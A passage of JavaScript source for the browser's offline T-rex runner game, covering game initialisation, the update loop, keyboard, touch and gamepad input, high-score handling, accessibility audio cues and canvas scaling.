        soundSrc = soundSrc.substr(soundSrc.indexOf(',') + 1);
        const buffer = decodeBase64ToArrayBuffer(soundSrc);

        // Async, so no guarantee of order in array.
        this.audioContext.decodeAudioData(buffer, function(index, audioData) {
            this.soundFx[index] = audioData;
          }.bind(this, sound));
      }
    }
  },

  /**
   * Sets the game speed. Adjust the speed accordingly if on a smaller screen.
   * @param {number=} opt_speed
   */
  setSpeed(opt_speed) {
    const speed = opt_speed || this.currentSpeed;

    // Reduce the speed on smaller mobile screens.
    if (this.dimensions.WIDTH < DEFAULT_WIDTH) {
      const mobileSpeed = Runner.slowDown ? speed :
                                            speed * this.dimensions.WIDTH /
              DEFAULT_WIDTH * this.config.MOBILE_SPEED_COEFFICIENT;
      this.currentSpeed = mobileSpeed > speed ? speed : mobileSpeed;
    } else if (opt_speed) {
      this.currentSpeed = opt_speed;
    }
  },

  /**
   * Game initialiser.
   */
  init() {
    // Hide the static icon.
    document.querySelector('.' + Runner.classes.ICON).style.visibility =
        'hidden';

    this.adjustDimensions();
    this.setSpeed();

    const ariaLabel = getA11yString(A11Y_STRINGS.ariaLabel);
    this.containerEl = document.createElement('div');
    this.containerEl.setAttribute('role', IS_MOBILE ? 'button' : 'application');
    this.containerEl.setAttribute('tabindex', '0');
    this.containerEl.setAttribute('title', ariaLabel);

    this.containerEl.className = Runner.classes.CONTAINER;

    // Player canvas container.
    this.canvas = createCanvas(this.containerEl, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);

    // Live region for game status updates.
    this.a11yStatusEl = document.createElement('span');
    this.a11yStatusEl.className = 'offline-runner-live-region';
    this.a11yStatusEl.setAttribute('aria-live', 'assertive');
    this.a11yStatusEl.textContent = '';
    Runner.a11yStatusEl = this.a11yStatusEl;

    // Add checkbox to slow down the game.
    this.slowSpeedCheckboxLabel = document.createElement('label');
    this.slowSpeedCheckboxLabel.className = 'slow-speed-option hidden';
    this.slowSpeedCheckboxLabel.textContent =
        getA11yString(A11Y_STRINGS.speedLabel);

    this.slowSpeedCheckbox = document.createElement('input');
    this.slowSpeedCheckbox.setAttribute('type', 'checkbox');
    this.slowSpeedCheckbox.setAttribute(
        'title', getA11yString(A11Y_STRINGS.speedLabel));
    this.slowSpeedCheckbox.setAttribute('tabindex', '0');
    this.slowSpeedCheckbox.setAttribute('checked', 'checked');

    this.slowSpeedToggleEl = document.createElement('span');
    this.slowSpeedToggleEl.className = 'slow-speed-toggle';

    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedCheckbox);
    this.slowSpeedCheckboxLabel.appendChild(this.slowSpeedToggleEl);

    if (IS_IOS) {
      this.outerContainerEl.appendChild(this.a11yStatusEl);
    } else {
      this.containerEl.appendChild(this.a11yStatusEl);
    }

    announcePhrase(getA11yString(A11Y_STRINGS.description));

    this.generatedSoundFx = new GeneratedSoundFx();

    this.canvasCtx =
        /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
    this.canvasCtx.fillStyle = '#f7f7f7';
    this.canvasCtx.fill();
    Runner.updateCanvasScaling(this.canvas);

    // Horizon contains clouds, obstacles and the ground.
    this.horizon = new Horizon(this.canvas, this.spriteDef, this.dimensions,
        this.config.GAP_COEFFICIENT);

    // Distance meter
    this.distanceMeter = new DistanceMeter(this.canvas,
          this.spriteDef.TEXT_SPRITE, this.dimensions.WIDTH);

    // Draw t-rex
    this.tRex = new Trex(this.canvas, this.spriteDef.TREX);

    this.outerContainerEl.appendChild(this.containerEl);
    this.outerContainerEl.appendChild(this.slowSpeedCheckboxLabel);

    this.startListening();
    this.update();

    window.addEventListener(Runner.events.RESIZE,
        this.debounceResize.bind(this));

    // Handle dark mode
    const darkModeMediaQuery =
        window.matchMedia('(prefers-color-scheme: dark)');
    this.isDarkMode = darkModeMediaQuery && darkModeMediaQuery.matches;
    darkModeMediaQuery.addListener((e) => {
      this.isDarkMode = e.matches;
    });
  },

  /**
   * Create the touch controller. A div that covers whole screen.
   */
  createTouchController() {
    this.touchController = document.createElement('div');
    this.touchController.className = Runner.classes.TOUCH_CONTROLLER;
    this.touchController.addEventListener(Runner.events.TOUCHSTART, this);
    this.touchController.addEventListener(Runner.events.TOUCHEND, this);
    this.outerContainerEl.appendChild(this.touchController);
  },

  /**
   * Debounce the resize event.
   */
  debounceResize() {
    if (!this.resizeTimerId_) {
      this.resizeTimerId_ =
          setInterval(this.adjustDimensions.bind(this), 250);
    }
  },

  /**
   * Adjust game space dimensions on resize.
   */
  adjustDimensions() {
    clearInterval(this.resizeTimerId_);
    this.resizeTimerId_ = null;

    const boxStyles = window.getComputedStyle(this.outerContainerEl);
    const padding = Number(boxStyles.paddingLeft.substr(0,
        boxStyles.paddingLeft.length - 2));

    this.dimensions.WIDTH = this.outerContainerEl.offsetWidth - padding * 2;
    if (this.isArcadeMode()) {
      this.dimensions.WIDTH = Math.min(DEFAULT_WIDTH, this.dimensions.WIDTH);
      if (this.activated) {
        this.setArcadeModeContainerScale();
      }
    }

    // Redraw the elements back onto the canvas.
    if (this.canvas) {
      this.canvas.width = this.dimensions.WIDTH;
      this.canvas.height = this.dimensions.HEIGHT;

      Runner.updateCanvasScaling(this.canvas);

      this.distanceMeter.calcXPos(this.dimensions.WIDTH);
      this.clearCanvas();
      this.horizon.update(0, 0, true);
      this.tRex.update(0);

      // Outer container and distance meter.
      if (this.playing || this.crashed || this.paused) {
        this.containerEl.style.width = this.dimensions.WIDTH + 'px';
        this.containerEl.style.height = this.dimensions.HEIGHT + 'px';
        this.distanceMeter.update(0, Math.ceil(this.distanceRan));
        this.stop();
      } else {
        this.tRex.draw(0, 0);
      }

      // Game over panel.
      if (this.crashed && this.gameOverPanel) {
        this.gameOverPanel.updateDimensions(this.dimensions.WIDTH);
        this.gameOverPanel.draw(this.altGameModeActive, this.tRex);
      }
    }
  },

  /**
   * Play the game intro.
   * Canvas container width expands out to the full width.
   */
  playIntro() {
    if (!this.activated && !this.crashed) {
      this.playingIntro = true;
      this.tRex.playingIntro = true;

      // CSS animation definition.
      const keyframes = '@-webkit-keyframes intro { ' +
            'from { width:' + Trex.config.WIDTH + 'px }' +
            'to { width: ' + this.dimensions.WIDTH + 'px }' +
          '}';
      document.styleSheets[0].insertRule(keyframes, 0);

      this.containerEl.addEventListener(Runner.events.ANIM_END,
          this.startGame.bind(this));

      this.containerEl.style.webkitAnimation = 'intro .4s ease-out 1 both';
      this.containerEl.style.width = this.dimensions.WIDTH + 'px';

      this.setPlayStatus(true);
      this.activated = true;
    } else if (this.crashed) {
      this.restart();
    }
  },


  /**
   * Update the game status to started.
   */
  startGame() {
    if (this.isArcadeMode()) {
      this.setArcadeMode();
    }
    this.toggleSpeed();
    this.runningTime = 0;
    this.playingIntro = false;
    this.tRex.playingIntro = false;
    this.containerEl.style.webkitAnimation = '';
    this.playCount++;
    this.generatedSoundFx.background();
    announcePhrase(getA11yString(A11Y_STRINGS.started));

    if (Runner.audioCues) {
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
    }

    // Handle tabbing off the page. Pause the current game.
    document.addEventListener(Runner.events.VISIBILITY,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.BLUR,
          this.onVisibilityChange.bind(this));

    window.addEventListener(Runner.events.FOCUS,
          this.onVisibilityChange.bind(this));
  },

  clearCanvas() {
    this.canvasCtx.clearRect(0, 0, this.dimensions.WIDTH,
        this.dimensions.HEIGHT);
  },

  /**
   * Checks whether the canvas area is in the viewport of the browser
   * through the current scroll position.
   * @return boolean.
   */
  isCanvasInView() {
    return this.containerEl.getBoundingClientRect().top >
        Runner.config.CANVAS_IN_VIEW_OFFSET;
  },

  /**
   * Enable the alt game mode. Switching out the sprites.
   */
  enableAltGameMode() {
    Runner.imageSprite = Runner.altGameImageSprite;
    Runner.spriteDefinition = Runner.spriteDefinitionByType[Runner.gameType];

    if (IS_HIDPI) {
      this.spriteDef = Runner.spriteDefinition.HDPI;
    } else {
      this.spriteDef = Runner.spriteDefinition.LDPI;
    }

    this.altGameModeActive = true;
    this.tRex.enableAltGameMode(this.spriteDef.TREX);
    this.horizon.enableAltGameMode(this.spriteDef);
    this.generatedSoundFx.background();
  },

  /**
   * Update the game frame and schedules the next one.
   */
  update() {
    this.updatePending = false;

    const now = getTimeStamp();
    let deltaTime = now - (this.time || now);

    // Flashing when switching game modes.
    if (this.altGameModeFlashTimer < 0 || this.altGameModeFlashTimer === 0) {
      this.altGameModeFlashTimer = null;
      this.tRex.setFlashing(false);
      this.enableAltGameMode();
    } else if (this.altGameModeFlashTimer > 0) {
      this.altGameModeFlashTimer -= deltaTime;
      this.tRex.update(deltaTime);
      deltaTime = 0;
    }

    this.time = now;

    if (this.playing) {
      this.clearCanvas();

      // Additional fade in - Prevents jump when switching sprites
      if (this.altGameModeActive &&
          this.fadeInTimer <= this.config.FADE_DURATION) {
        this.fadeInTimer += deltaTime / 1000;
        this.canvasCtx.globalAlpha = this.fadeInTimer;
      } else {
        this.canvasCtx.globalAlpha = 1;
      }

      if (this.tRex.jumping) {
        this.tRex.updateJump(deltaTime);
      }

      this.runningTime += deltaTime;
      const hasObstacles = this.runningTime > this.config.CLEAR_TIME;

      // First jump triggers the intro.
      if (this.tRex.jumpCount === 1 && !this.playingIntro) {
        this.playIntro();
      }

      // The horizon doesn't move until the intro is over.
      if (this.playingIntro) {
        this.horizon.update(0, this.currentSpeed, hasObstacles);
      } else if (!this.crashed) {
        const showNightMode = this.isDarkMode ^ this.inverted;
        deltaTime = !this.activated ? 0 : deltaTime;
        this.horizon.update(
            deltaTime, this.currentSpeed, hasObstacles, showNightMode);
      }

      // Check for collisions.
      let collision = hasObstacles &&
          checkForCollision(this.horizon.obstacles[0], this.tRex);

      // For a11y, audio cues.
      if (Runner.audioCues && hasObstacles) {
        const jumpObstacle =
            this.horizon.obstacles[0].typeConfig.type != 'COLLECTABLE';

        if (!this.horizon.obstacles[0].jumpAlerted) {
          const threshold = Runner.isMobileMouseInput ?
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD_MOBILE_A11Y :
              Runner.config.AUDIOCUE_PROXIMITY_THRESHOLD;
          const adjProximityThreshold = threshold +
              (threshold * Math.log10(this.currentSpeed / Runner.config.SPEED));

          if (this.horizon.obstacles[0].xPos < adjProximityThreshold) {
            if (jumpObstacle) {
              this.generatedSoundFx.jump();
            }
            this.horizon.obstacles[0].jumpAlerted = true;
          }
        }
      }

      // Activated alt game mode.
      if (Runner.isAltGameModeEnabled() && collision &&
          this.horizon.obstacles[0].typeConfig.type == 'COLLECTABLE') {
        this.horizon.removeFirstObstacle();
        this.tRex.setFlashing(true);
        collision = false;
        this.altGameModeFlashTimer = this.config.FLASH_DURATION;
        this.runningTime = 0;
        this.generatedSoundFx.collect();
      }

      if (!collision) {
        this.distanceRan += this.currentSpeed * deltaTime / this.msPerFrame;

        if (this.currentSpeed < this.config.MAX_SPEED) {
          this.currentSpeed += this.config.ACCELERATION;
        }
      } else {
        this.gameOver();
      }

      const playAchievementSound = this.distanceMeter.update(deltaTime,
          Math.ceil(this.distanceRan));

      if (!Runner.audioCues && playAchievementSound) {
        this.playSound(this.soundFx.SCORE);
      }

      // Night mode.
      if (!Runner.isAltGameModeEnabled()) {
        if (this.invertTimer > this.config.INVERT_FADE_DURATION) {
          this.invertTimer = 0;
          this.invertTrigger = false;
          this.invert(false);
        } else if (this.invertTimer) {
          this.invertTimer += deltaTime;
        } else {
          const actualDistance =
              this.distanceMeter.getActualDistance(Math.ceil(this.distanceRan));

          if (actualDistance > 0) {
            this.invertTrigger =
                !(actualDistance % this.config.INVERT_DISTANCE);

            if (this.invertTrigger && this.invertTimer === 0) {
              this.invertTimer += deltaTime;
              this.invert(false);
            }
          }
        }
      }
    }

    if (this.playing || (!this.activated &&
        this.tRex.blinkCount < Runner.config.MAX_BLINK_COUNT)) {
      this.tRex.update(deltaTime);
      this.scheduleNextUpdate();
    }
  },

  /**
   * Event handler.
   * @param {Event} e
   */
  handleEvent(e) {
    return (function(evtType, events) {
      switch (evtType) {
        case events.KEYDOWN:
        case events.TOUCHSTART:
        case events.POINTERDOWN:
          this.onKeyDown(e);
          break;
        case events.KEYUP:
        case events.TOUCHEND:
        case events.POINTERUP:
          this.onKeyUp(e);
          break;
        case events.GAMEPADCONNECTED:
          this.onGamepadConnected(e);
          break;
      }
    }.bind(this))(e.type, Runner.events);
  },

  /**
   * Initialize audio cues if activated by focus on the canvas element.
   * @param {Event} e
   */
  handleCanvasKeyPress(e) {
    if (!this.activated && !Runner.audioCues) {
      this.toggleSpeed();
      Runner.audioCues = true;
      this.generatedSoundFx.init();
      Runner.generatedSoundFx = this.generatedSoundFx;
      Runner.config.CLEAR_TIME *= 1.2;
    } else if (e.keyCode && Runner.keycodes.JUMP[e.keyCode]) {
      this.onKeyDown(e);
    }
  },

  /**
   * Prevent space key press from scrolling.
   * @param {Event} e
   */
  preventScrolling(e) {
    if (e.keyCode === 32) {
      e.preventDefault();
    }
  },

  /**
   * Toggle speed setting if toggle is shown.
   */
  toggleSpeed() {
    if (Runner.audioCues) {
      const speedChange = Runner.slowDown != this.slowSpeedCheckbox.checked;

      if (speedChange) {
        Runner.slowDown = this.slowSpeedCheckbox.checked;
        const updatedConfig =
            Runner.slowDown ? Runner.slowConfig : Runner.normalConfig;

        Runner.config = Object.assign(Runner.config, updatedConfig);
        this.currentSpeed = updatedConfig.SPEED;
        this.tRex.enableSlowConfig();
        this.horizon.adjustObstacleSpeed();
      }
      if (this.playing) {
        this.disableSpeedToggle(true);
      }
    }
  },

  /**
   * Show the speed toggle.
   * From focus event or when audio cues are activated.
   * @param {Event=} e
   */
  showSpeedToggle(e) {
    const isFocusEvent = e && e.type == 'focus';
    if (Runner.audioCues || isFocusEvent) {
      this.slowSpeedCheckboxLabel.classList.toggle(
          HIDDEN_CLASS, isFocusEvent ? false : !this.crashed);
    }
  },

  /**
   * Disable the speed toggle.
   * @param {boolean} disable
   */
  disableSpeedToggle(disable) {
    if (disable) {
      this.slowSpeedCheckbox.setAttribute('disabled', 'disabled');
    } else {
      this.slowSpeedCheckbox.removeAttribute('disabled');
    }
  },

  /**
   * Bind relevant key / mouse / touch listeners.
   */
  startListening() {
    // A11y keyboard / screen reader activation.
    this.containerEl.addEventListener(
        Runner.events.KEYDOWN, this.handleCanvasKeyPress.bind(this));
    if (!IS_MOBILE) {
      this.containerEl.addEventListener(
          Runner.events.FOCUS, this.showSpeedToggle.bind(this));
    }
    this.canvas.addEventListener(
        Runner.events.KEYDOWN, this.preventScrolling.bind(this));
    this.canvas.addEventListener(
        Runner.events.KEYUP, this.preventScrolling.bind(this));

    // Keys.
    document.addEventListener(Runner.events.KEYDOWN, this);
    document.addEventListener(Runner.events.KEYUP, this);

    // Touch / pointer.
    this.containerEl.addEventListener(Runner.events.TOUCHSTART, this);
    document.addEventListener(Runner.events.POINTERDOWN, this);
    document.addEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      // Gamepad
      window.addEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Remove all listeners.
   */
  stopListening() {
    document.removeEventListener(Runner.events.KEYDOWN, this);
    document.removeEventListener(Runner.events.KEYUP, this);

    if (this.touchController) {
      this.touchController.removeEventListener(Runner.events.TOUCHSTART, this);
      this.touchController.removeEventListener(Runner.events.TOUCHEND, this);
    }

    this.containerEl.removeEventListener(Runner.events.TOUCHSTART, this);
    document.removeEventListener(Runner.events.POINTERDOWN, this);
    document.removeEventListener(Runner.events.POINTERUP, this);

    if (this.isArcadeMode()) {
      window.removeEventListener(Runner.events.GAMEPADCONNECTED, this);
    }
  },

  /**
   * Process keydown.
   * @param {Event} e
   */
  onKeyDown(e) {
    // Prevent native page scrolling whilst tapping on mobile.
    if (IS_MOBILE && this.playing) {
      e.preventDefault();
    }

    if (this.isCanvasInView()) {
      // Allow toggling of speed toggle.
      if (Runner.keycodes.JUMP[e.keyCode] &&
          e.target == this.slowSpeedCheckbox) {
        return;
      }

      if (!this.crashed && !this.paused) {
        // For a11y, screen reader activation.
        const isMobileMouseInput = IS_MOBILE &&
                e.type === Runner.events.POINTERDOWN &&
                e.pointerType == 'mouse' && e.target == this.containerEl ||
            (IS_IOS && e.pointerType == 'touch' &&
             document.activeElement == this.containerEl);

        if (Runner.keycodes.JUMP[e.keyCode] ||
            e.type === Runner.events.TOUCHSTART || isMobileMouseInput ||
            (Runner.keycodes.DUCK[e.keyCode] && this.altGameModeActive)) {
          e.preventDefault();
          // Starting the game for the first time.
          if (!this.playing) {
            // Started by touch so create a touch controller.
            if (!this.touchController && e.type === Runner.events.TOUCHSTART) {
              this.createTouchController();
            }

            if (isMobileMouseInput) {
              this.handleCanvasKeyPress(e);
            }
            this.loadSounds();
            this.setPlayStatus(true);
            this.update();
            if (window.errorPageController) {
              errorPageController.trackEasterEgg();
            }
          }
          // Start jump.
          if (!this.tRex.jumping && !this.tRex.ducking) {
            if (Runner.audioCues) {
              this.generatedSoundFx.cancelFootSteps();
            } else {
              this.playSound(this.soundFx.BUTTON_PRESS);
            }
            this.tRex.startJump(this.currentSpeed);
          }
          // Ducking is disabled on alt game modes.
        } else if (
            !this.altGameModeActive && this.playing &&
            Runner.keycodes.DUCK[e.keyCode]) {
          e.preventDefault();
          if (this.tRex.jumping) {
            // Speed drop, activated only when jump key is not pressed.
            this.tRex.setSpeedDrop();
          } else if (!this.tRex.jumping && !this.tRex.ducking) {
            // Duck.
            this.tRex.setDuck(true);
          }
        }
      }
    }
  },

  /**
   * Process key up.
   * @param {Event} e
   */
  onKeyUp(e) {
    const keyCode = String(e.keyCode);
    const isjumpKey = Runner.keycodes.JUMP[keyCode] ||
        e.type === Runner.events.TOUCHEND || e.type === Runner.events.POINTERUP;

    if (this.isRunning() && isjumpKey) {
      this.tRex.endJump();
    } else if (Runner.keycodes.DUCK[keyCode]) {
      this.tRex.speedDrop = false;
      this.tRex.setDuck(false);
    } else if (this.crashed) {
      // Check that enough time has elapsed before allowing jump key to restart.
      const deltaTime = getTimeStamp() - this.time;

      if (this.isCanvasInView() &&
          (Runner.keycodes.RESTART[keyCode] || this.isLeftClickOnCanvas(e) ||
          (deltaTime >= this.config.GAMEOVER_CLEAR_TIME &&
          Runner.keycodes.JUMP[keyCode]))) {
        this.handleGameOverClicks(e);
      }
    } else if (this.paused && isjumpKey) {
      // Reset the jump state
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Process gamepad connected event.
   * @param {Event} e
   */
  onGamepadConnected(e) {
    if (!this.pollingGamepads) {
      this.pollGamepadState();
    }
  },

  /**
   * rAF loop for gamepad polling.
   */
  pollGamepadState() {
    const gamepads = navigator.getGamepads();
    this.pollActiveGamepad(gamepads);

    this.pollingGamepads = true;
    requestAnimationFrame(this.pollGamepadState.bind(this));
  },

  /**
   * Polls for a gamepad with the jump button pressed. If one is found this
   * becomes the "active" gamepad and all others are ignored.
   * @param {!Array<Gamepad>} gamepads
   */
  pollForActiveGamepad(gamepads) {
    for (let i = 0; i < gamepads.length; ++i) {
      if (gamepads[i] && gamepads[i].buttons.length > 0 &&
          gamepads[i].buttons[0].pressed) {
        this.gamepadIndex = i;
        this.pollActiveGamepad(gamepads);
        return;
      }
    }
  },

  /**
   * Polls the chosen gamepad for button presses and generates KeyboardEvents
   * to integrate with the rest of the game logic.
   * @param {!Array<Gamepad>} gamepads
   */
  pollActiveGamepad(gamepads) {
    if (this.gamepadIndex === undefined) {
      this.pollForActiveGamepad(gamepads);
      return;
    }

    const gamepad = gamepads[this.gamepadIndex];
    if (!gamepad) {
      this.gamepadIndex = undefined;
      this.pollForActiveGamepad(gamepads);
      return;
    }

    // The gamepad specification defines the typical mapping of physical buttons
    // to button indices: https://w3c.github.io/gamepad/#remapping
    this.pollGamepadButton(gamepad, 0, 38);  // Jump
    if (gamepad.buttons.length >= 2) {
      this.pollGamepadButton(gamepad, 1, 40);  // Duck
    }
    if (gamepad.buttons.length >= 10) {
      this.pollGamepadButton(gamepad, 9, 13);  // Restart
    }

    this.previousGamepad = gamepad;
  },

  /**
   * Generates a key event based on a gamepad button.
   * @param {!Gamepad} gamepad
   * @param {number} buttonIndex
   * @param {number} keyCode
   */
  pollGamepadButton(gamepad, buttonIndex, keyCode) {
    const state = gamepad.buttons[buttonIndex].pressed;
    let previousState = false;
    if (this.previousGamepad) {
      previousState = this.previousGamepad.buttons[buttonIndex].pressed;
    }
    // Generate key events on the rising and falling edge of a button press.
    if (state !== previousState) {
      const e = new KeyboardEvent(state ? Runner.events.KEYDOWN
                                      : Runner.events.KEYUP,
                                { keyCode: keyCode });
      document.dispatchEvent(e);
    }
  },

  /**
   * Handle interactions on the game over screen state.
   * A user is able to tap the high score twice to reset it.
   * @param {Event} e
   */
  handleGameOverClicks(e) {
    if (e.target != this.slowSpeedCheckbox) {
      e.preventDefault();
      if (this.distanceMeter.hasClickedOnHighScore(e) && this.highestScore) {
        if (this.distanceMeter.isHighScoreFlashing()) {
          // Subsequent click, reset the high score.
          this.saveHighScore(0, true);
          this.distanceMeter.resetHighScore();
        } else {
          // First click, flash the high score.
          this.distanceMeter.startHighScoreFlashing();
        }
      } else {
        this.distanceMeter.cancelHighScoreFlashing();
        this.restart();
      }
    }
  },

  /**
   * Returns whether the event was a left click on canvas.
   * On Windows right click is registered as a click.
   * @param {Event} e
   * @return {boolean}
   */
  isLeftClickOnCanvas(e) {
    return e.button != null && e.button < 2 &&
        e.type === Runner.events.POINTERUP &&
        (e.target === this.canvas ||
         (IS_MOBILE && Runner.audioCues && e.target === this.containerEl));
  },

  /**
   * RequestAnimationFrame wrapper.
   */
  scheduleNextUpdate() {
    if (!this.updatePending) {
      this.updatePending = true;
      this.raqId = requestAnimationFrame(this.update.bind(this));
    }
  },

  /**
   * Whether the game is running.
   * @return {boolean}
   */
  isRunning() {
    return !!this.raqId;
  },

  /**
   * Set the initial high score as stored in the user's profile.
   * @param {number} highScore
   */
  initializeHighScore(highScore) {
    this.syncHighestScore = true;
    highScore = Math.ceil(highScore);
    if (highScore < this.highestScore) {
      if (window.errorPageController) {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
      return;
    }
    this.highestScore = highScore;
    this.distanceMeter.setHighScore(this.highestScore);
  },

  /**
   * Sets the current high score and saves to the profile if available.
   * @param {number} distanceRan Total distance ran.
   * @param {boolean=} opt_resetScore Whether to reset the score.
   */
  saveHighScore(distanceRan, opt_resetScore) {
    this.highestScore = Math.ceil(distanceRan);
    this.distanceMeter.setHighScore(this.highestScore);

    // Store the new high score in the profile.
    if (this.syncHighestScore && window.errorPageController) {
      if (opt_resetScore) {
        errorPageController.resetEasterEggHighScore();
      } else {
        errorPageController.updateEasterEggHighScore(this.highestScore);
      }
    }
  },

  /**
   * Game over state.
   */
  gameOver() {
    this.playSound(this.soundFx.HIT);
    vibrate(200);

    this.stop();
    this.crashed = true;
    this.distanceMeter.achievement = false;

    this.tRex.update(100, Trex.status.CRASHED);

    // Game over panel.
    if (!this.gameOverPanel) {
      const origSpriteDef = IS_HIDPI ?
          Runner.spriteDefinitionByType.original.HDPI :
          Runner.spriteDefinitionByType.original.LDPI;

      if (this.canvas) {
        if (Runner.isAltGameModeEnabled()) {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions, origSpriteDef.ALT_GAME_END,
              this.altGameModeActive);
        } else {
          this.gameOverPanel = new GameOverPanel(
              this.canvas, origSpriteDef.TEXT_SPRITE, origSpriteDef.RESTART,
              this.dimensions);
        }
      }
    }

    this.gameOverPanel.draw(this.altGameModeActive, this.tRex);

    // Update the high score.
    if (this.distanceRan > this.highestScore) {
      this.saveHighScore(this.distanceRan);
    }

    // Reset the time clock.
    this.time = getTimeStamp();

    if (Runner.audioCues) {
      this.generatedSoundFx.stopAll();
      announcePhrase(
          getA11yString(A11Y_STRINGS.gameOver)
              .replace(
                  '$1',
                  this.distanceMeter.getActualDistance(this.distanceRan)
                      .toString()) +
          ' ' +
          getA11yString(A11Y_STRINGS.highScore)
              .replace(
                  '$1',
                  this.distanceMeter.getActualDistance(this.highestScore)
                      .toString()));
      this.containerEl.setAttribute(
          'title', getA11yString(A11Y_STRINGS.ariaLabel));
    }
    this.showSpeedToggle();
    this.disableSpeedToggle(false);
  },

  stop() {
    this.setPlayStatus(false);
    this.paused = true;
    cancelAnimationFrame(this.raqId);
    this.raqId = 0;
    this.generatedSoundFx.stopAll();
  },

  play() {
    if (!this.crashed) {
      this.setPlayStatus(true);
      this.paused = false;
      this.tRex.update(0, Trex.status.RUNNING);
      this.time = getTimeStamp();
      this.update();
      this.generatedSoundFx.background();
    }
  },

  restart() {
    if (!this.raqId) {
      this.playCount++;
      this.runningTime = 0;
      this.setPlayStatus(true);
      this.toggleSpeed();
      this.paused = false;
      this.crashed = false;
      this.distanceRan = 0;
      this.setSpeed(this.config.SPEED);
      this.time = getTimeStamp();
      this.containerEl.classList.remove(Runner.classes.CRASHED);
      this.clearCanvas();
      this.distanceMeter.reset();
      this.horizon.reset();
      this.tRex.reset();
      this.playSound(this.soundFx.BUTTON_PRESS);
      this.invert(true);
      this.flashTimer = null;
      this.update();
      this.gameOverPanel.reset();
      this.generatedSoundFx.background();
      this.containerEl.setAttribute('title', getA11yString(A11Y_STRINGS.jump));
      announcePhrase(getA11yString(A11Y_STRINGS.started));
    }
  },

  setPlayStatus(isPlaying) {
    if (this.touchController) {
      this.touchController.classList.toggle(HIDDEN_CLASS, !isPlaying);
    }
    this.playing = isPlaying;
  },

  /**
   * Whether the game should go into arcade mode.
   * @return {boolean}
   */
  isArcadeMode() {
    // In RTL languages the title is wrapped with the left to right mark
    // control characters &#x202A; and &#x202C;, which are invisible.
    return IS_RTL ? document.title.indexOf(ARCADE_MODE_URL) == 1 :
                    document.title === ARCADE_MODE_URL;
  },

  /**
   * Hides offline messaging for a fullscreen game only experience.
   */
  setArcadeMode() {
    document.body.classList.add(Runner.classes.ARCADE_MODE);
    this.setArcadeModeContainerScale();
  },

  /**
   * Sets the scaling for arcade mode.
   */
  setArcadeModeContainerScale() {
    const windowHeight = window.innerHeight;
    const scaleHeight = windowHeight / this.dimensions.HEIGHT;
    const scaleWidth = window.innerWidth / this.dimensions.WIDTH;
    const scale = Math.max(1, Math.min(scaleHeight, scaleWidth));
    const scaledCanvasHeight = this.dimensions.HEIGHT * scale;
    // Positions the game container at 10% of the available vertical window
    // height minus the game container height.
    const translateY = Math.ceil(Math.max(0, (windowHeight - scaledCanvasHeight -
        Runner.config.ARCADE_MODE_INITIAL_TOP_POSITION) *
        Runner.config.ARCADE_MODE_TOP_POSITION_PERCENT)) *
        window.devicePixelRatio;

    const cssScale = IS_RTL ? -scale + ',' + scale : scale;
    this.containerEl.style.transform =
        'scale(' + cssScale + ') translateY(' + translateY + 'px)';
  },

  /**
   * Pause the game if the tab is not in focus.
   */
  onVisibilityChange(e) {
    if (document.hidden || document.webkitHidden || e.type === 'blur' ||
        document.visibilityState !== 'visible') {
      this.stop();
    } else if (!this.crashed) {
      this.tRex.reset();
      this.play();
    }
  },

  /**
   * Play a sound.
   * @param {AudioBuffer} soundBuffer
   */
  playSound(soundBuffer) {
    if (soundBuffer) {
      const sourceNode = this.audioContext.createBufferSource();
      sourceNode.buffer = soundBuffer;
      sourceNode.connect(this.audioContext.destination);
      sourceNode.start(0);
    }
  },

  /**
   * Inverts the current page / canvas colors.
   * @param {boolean} reset Whether to reset colors.
   */
  invert(reset) {
    const htmlEl = document.firstElementChild;

    if (reset) {
      htmlEl.classList.toggle(Runner.classes.INVERTED,
          false);
      this.invertTimer = 0;
      this.inverted = false;
    } else {
      this.inverted = htmlEl.classList.toggle(
          Runner.classes.INVERTED, this.invertTrigger);
    }
  },
};


/**
 * Updates the canvas size taking into
 * account the backing store pixel ratio and
 * the device pixel ratio.
 *
 * See article by Paul Lewis:
 * http://www.html5rocks.com/en/tutorials/canvas/hidpi/
 *
 * @param {HTMLCanvasElement} canvas
 * @param {number=} opt_width
 * @param {number=} opt_height
 * @return {boolean} Whether the canvas was scaled.
 */
Runner.updateCanvasScaling = function(canvas, opt_width, opt_height) {
  const context =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));

  // Query the various pixel ratios
  const devicePixelRatio = Math.floor(window.devicePixelRatio) || 1;
  /** @suppress {missingProperties} */
  const backingStoreRatio =
      Math.floor(context.webkitBackingStorePixelRatio) || 1;
  const ratio = devicePixelRatio / backingStoreRatio;

  // Upscale the canvas if the two ratios don't match
  if (devicePixelRatio !== backingStoreRatio) {
    const oldWidth = opt_width || canvas.width;
    const oldHeight = opt_height || canvas.height;

    canvas.width = oldWidth * ratio;
    canvas.height = oldHeight * ratio;

    canvas.style.width = oldWidth + 'px';
    canvas.style.height = oldHeight + 'px';

    // Scale the context to counter the fact that we've manually scaled
    // our canvas element.
    context.scale(ratio, ratio);
    return true;
  } else if (devicePixelRatio === 1) {
    // Reset the canvas width / height. Fixes scaling bug when the page is
    // zoomed and the devicePixelRatio changes accordingly.
    canvas.style.width = canvas.width + 'px';
    canvas.style.height = canvas.height + 'px';
  }
  return false;
};


/**
 * Whether the alt game mode is enabled.
 * @return {boolean}
 */
Runner.isAltGameModeEnabled = function() {
  return loadTimeData && loadTimeData.valueExists('enableAltGameMode');
};


/**
 * Generated sound FX class for audio cues.
 * @constructor
 */
function GeneratedSoundFx() {
  this.audioCues = false;
  this.context = null;
  this.panner = null;
}

GeneratedSoundFx.prototype = {
  init() {
    this.audioCues = true;
    if (!this.context) {
      // iOS only supports the webkit version.
      this.context = window.webkitAudioContext ? new webkitAudioContext() :
                                                 new AudioContext();
      if (IS_IOS) {
        this.context.onstatechange = (function() {
